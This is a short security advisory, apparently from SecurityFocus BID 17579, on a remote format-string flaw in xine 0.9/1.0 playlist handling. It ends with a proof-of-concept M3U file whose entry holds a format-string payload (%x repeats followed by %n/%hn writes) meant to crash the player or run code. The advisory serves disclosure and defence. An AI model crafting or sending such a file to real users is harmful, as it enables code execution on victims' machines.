Xine 0.9/1.0 Playlist Handling Remote Format String Vulnerability



source: http://www.securityfocus.com/bid/17579/info


The xine package is reported prone to a remote format-string vulnerability. 

This issue arises when the application handles specially crafted playlist files. An attacker can exploit this vulnerability by crafting a malicious file that contains format specifiers and then sending the file to an unsuspecting user. 

A successful attack may crash the application or lead to arbitrary code execution. 

All versions of xine are considered vulnerable at the moment.

#EXTM3U
#EXTINFO !!All_You_Playlists_Are_Belong_To_Us - SHHEEEELLLLCCCCOOOOOODDDDDDEEEEEEEEEEE!!
AAAAAAAAAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%.13068u%n%hn